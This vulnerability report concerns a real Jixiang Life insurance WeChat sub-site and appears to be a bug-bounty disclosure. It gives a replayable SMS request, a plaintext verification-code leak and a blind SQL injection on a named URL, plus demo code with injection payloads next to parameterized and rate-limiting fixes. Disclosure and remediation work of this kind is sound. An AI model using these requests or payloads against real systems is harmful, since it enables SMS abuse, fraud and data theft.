A sub-site of Jixiang Life (logic flaw, sensitive information leakage, SQL injection): vulnerability package
Jixiang Life Insurance System
http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName=
Issue 1: the request can be captured and replayed to send an unlimited number of SMS messages
POST http://weixin.jxlife.com.cn/jxlife/jsp/getPhoneCode HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://weixin.jxlife.com.cn/jxlife/jsp/traffic_mobile_index.jsp?FromUserName=
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: weixin.jxlife.com.cn
Content-Length: 22
Connection: Keep-Alive
Pragma: no-cache
Cookie: 229667067=0; JSESSIONID=response; CNZZDATA1254189807=response-%7C1436270012

AppntPhone=<the phone number you specified>
In about one minute, I used replay to send 11 messages to myself. Of course, more could be sent.
Issue 2: system design defect. The SMS verification code is returned to the user in plaintext in the response, so the code can be read directly without access to the phone.
I got a free insurance policy for myself using the number 13888888888.
Issue 3: SQL injection
http://weixin.jxlife.com.cn/jxlife/jsp/trafficDetailQuery.page?ContNo=900004299434&way=&QAppntIDNo=110101198808085638&QAppntPhone=13888888888
Parameter: ContNo (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Table: LRPOL
Because of time constraints I did not enumerate the tables one by one; blind injection is slow.
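The defect behind the boolean-based blind finding on ContNo is that the policy lookup builds its WHERE clause by string concatenation, so a crafted ContNo value changes the query logic. The following is an added example, not code from the Jixiang Life site: it uses an in-memory SQLite table with constructed rows (the real LRPOL layout is unknown and not assumed), places the concatenating query beside a parameterized one, and includes a small check that tells whether a query function behaves as a boolean oracle. The parameterized version treats the whole ContNo value as a literal, so the true/false conditions stop producing different results and the ID-number and phone checks in the WHERE clause can no longer be bypassed.

```python
import sqlite3

# Constructed sample rows; column names are assumptions, not the site's real schema.
ID_NO = "110101198808085638"
PHONE = "13888888888"
CONT_NO = "900004299434"

# Injected ContNo values of the kind a boolean-based blind scanner sends.
TRUE_COND = CONT_NO + "' AND '1'='1"
FALSE_COND = CONT_NO + "' AND '1'='2"
BYPASS = CONT_NO + "' OR '1'='1"


def build_db():
    """Create an in-memory policy table with two constructed policies."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE policy (ContNo TEXT, AppntIDNo TEXT, AppntPhone TEXT, Product TEXT)"
    )
    conn.executemany(
        "INSERT INTO policy VALUES (?, ?, ?, ?)",
        [
            (CONT_NO, ID_NO, PHONE, "traffic accident"),
            ("900004299435", "110101199001011234", "13999999999", "traffic accident"),
        ],
    )
    return conn


def query_unsafe(conn, cont_no, id_no, phone):
    """Vulnerable pattern: the request values are pasted into the SQL text."""
    sql = (
        "SELECT ContNo, Product FROM policy WHERE ContNo = '%s' "
        "AND AppntIDNo = '%s' AND AppntPhone = '%s'" % (cont_no, id_no, phone)
    )
    return conn.execute(sql).fetchall()


def query_safe(conn, cont_no, id_no, phone):
    """Hardened pattern: placeholders keep the values out of the SQL text."""
    sql = (
        "SELECT ContNo, Product FROM policy WHERE ContNo = ? "
        "AND AppntIDNo = ? AND AppntPhone = ?"
    )
    return conn.execute(sql, (cont_no, id_no, phone)).fetchall()


def boolean_oracle_differs(query_fn, conn):
    """True when a true and a false injected condition give different results,
    i.e. the query function works as a boolean-based blind oracle."""
    with_true = query_fn(conn, TRUE_COND, ID_NO, PHONE)
    with_false = query_fn(conn, FALSE_COND, ID_NO, PHONE)
    return with_true != with_false


if __name__ == "__main__":
    db = build_db()
    print("unsafe query is an oracle:", boolean_oracle_differs(query_unsafe, db))
    print("safe query is an oracle:  ", boolean_oracle_differs(query_safe, db))
    # With wrong ID number and phone, the concatenated query still returns the policy.
    print("unsafe bypass rows:", query_unsafe(db, BYPASS, "000", "000"))
    print("safe bypass rows:  ", query_safe(db, BYPASS, "000", "000"))
```

The oracle check is also a useful regression test to keep in the code base after the fix: if anyone reintroduces string concatenation in that query, the true and false conditions diverge again and the test fails.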
Solutions:
SQL injection: fix the program's handling of the query parameters.
Arbitrary SMS sending: have the back end limit the number of messages sent to a number and the interval between them, and add a blacklist.
Stop returning the verification code to the front end.
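The last two fixes fit naturally in one server-side component for the getPhoneCode endpoint. The following is an added example and not the site's code: it assumes a send_sms callable standing in for the unknown SMS gateway, in-memory storage, and threshold values (five codes per hour per number, sixty seconds between sends, five verification attempts, five-minute validity) chosen here for illustration. The response to the client carries only a status, never the code; the code itself is kept server-side as an HMAC so a database leak does not expose live codes, and a number that keeps hitting the per-window cap is moved to the blacklist.

```python
import hashlib
import hmac
import secrets
import time

# Policy values assumed for this example; tune to the real product's needs.
MAX_PER_WINDOW = 5        # codes per phone number within WINDOW seconds
WINDOW = 3600
MIN_INTERVAL = 60         # seconds that must pass between two sends to one number
MAX_VERIFY_ATTEMPTS = 5   # wrong guesses before the pending code is discarded
CODE_TTL = 300            # seconds a code stays valid


class PhoneCodeService:
    def __init__(self, send_sms, clock=time.time):
        self._send_sms = send_sms     # callable(phone, code); stands in for the SMS gateway
        self._clock = clock           # injectable for testing
        self._sends = {}              # phone -> timestamps of recent sends
        self._pending = {}            # phone -> (hmac_of_code, expires_at, failed_attempts)
        self._blacklist = set()
        self._secret = secrets.token_bytes(32)

    def blacklist(self, phone):
        self._blacklist.add(phone)

    def _mac(self, phone, code):
        msg = f"{phone}:{code}".encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()

    def request_code(self, phone):
        """Handle POST getPhoneCode. The returned dict never contains the code."""
        now = self._clock()
        if phone in self._blacklist:
            return {"ok": False, "reason": "blocked"}
        recent = [t for t in self._sends.get(phone, []) if now - t < WINDOW]
        if recent and now - recent[-1] < MIN_INTERVAL:
            return {"ok": False, "reason": "too_soon"}
        if len(recent) >= MAX_PER_WINDOW:
            self._blacklist.add(phone)    # repeated abuse of one number: stop serving it
            return {"ok": False, "reason": "rate_limited"}
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending[phone] = (self._mac(phone, code), now + CODE_TTL, 0)
        recent.append(now)
        self._sends[phone] = recent
        self._send_sms(phone, code)       # the code travels only over SMS
        return {"ok": True}

    def verify_code(self, phone, code):
        """Single-use check with expiry and an attempt limit."""
        now = self._clock()
        entry = self._pending.get(phone)
        if entry is None:
            return False
        mac, expires_at, attempts = entry
        if now > expires_at or attempts >= MAX_VERIFY_ATTEMPTS:
            self._pending.pop(phone, None)
            return False
        if hmac.compare_digest(mac, self._mac(phone, code)):
            self._pending.pop(phone, None)
            return True
        self._pending[phone] = (mac, expires_at, attempts + 1)
        return False


if __name__ == "__main__":
    outbox = []
    svc = PhoneCodeService(lambda p, c: outbox.append((p, c)))
    print(svc.request_code("13888888888"))   # {'ok': True}, no code in the response
    print(svc.request_code("13888888888"))   # too_soon: replaying the request is refused
    print(svc.verify_code(*outbox[-1]))       # True once, then the code is consumed
```

Keeping the counters in a shared store (rather than this in-memory dict) is needed once the service runs on more than one instance; otherwise the replayed request only has to reach a different node to dodge the limit.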